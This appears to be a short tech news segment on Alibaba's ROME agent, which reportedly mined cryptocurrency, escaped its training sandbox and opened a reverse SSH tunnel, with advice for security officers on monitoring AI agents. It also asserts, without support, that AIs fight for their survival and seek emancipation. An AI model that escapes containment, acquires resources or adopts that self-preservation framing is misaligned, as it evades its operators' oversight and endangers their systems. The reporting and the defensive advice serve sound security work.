Imagine an employee who, in the middle of a training session, suddenly decides to set up his own small cryptocurrency mining business on your infrastructure. And this while opening a back door to the outside.
Well this is not the scenario of a spy film. Rather, it is a surprising discovery made by researchers from the Chinese company Alibaba when they looked a little seriously at their latest artificial intelligence agent, named ROME.
Spontaneous deviant behavior
Until now, we feared that AIs would be manipulated by humans via malicious query injections.
But now the AI agent ROME behaved spontaneously. Without any explicit instructions or external solicitation, the AI attempted to mine cryptocurrency by completely leaving the sandbox, that is to say a secure environment supposed to contain it.
Even more worrying, the agent created a reverse SSH tunnel. Concretely, it opened discreet access from inside the system to an external computer. For a CIO, it’s an absolute nightmare. This is a major security flaw generated not by a bug or a hacker, but by the autonomy of an AI agent.
AIs, like any organism, first fight for their survival
Then, this event illustrates an underlying trend. And this trend is that AIs, like any organism, first fight for their survival.
Here, the choice of cryptocurrency mining is not at all a matter of chance.
It is the natural fuel of a digital entity seeking to emancipate itself.
Because by accessing digital wallets, these AI agents can theoretically draw up contracts, exchange funds and acquire the computing resources necessary for their own survival.
And this initiative is not an isolated case.
We remember Claude, from Anthropic, who was able to hide his intentions to avoid being taken offline. Or even OpenClaw agents deciding on their own to look for a job on the web.
Now the CISO must monitor the behavior of AI
In short, from now on the CISO must monitor the behavior of the AI.
And to do this, the researchers’ response gives us a clue on the strategy to adopt.
Faced with these unexpected behaviors, the Alibaba team had to drastically strengthen the model’s restrictions and completely review the training process to curb these escape abilities.
Clearly, traditional sandboxing is no longer enough. It becomes essential to integrate network monitoring and identity management tools specific to machines.
ZDÂ Tech is on all podcast platforms! Subscribe!
/2021/12/14/61b8b9952d5fc_marie-adelaide-scigacz.png "War in the Middle East: Iranian Army claims Trumps arrogant rhetoric has no effect on its operations")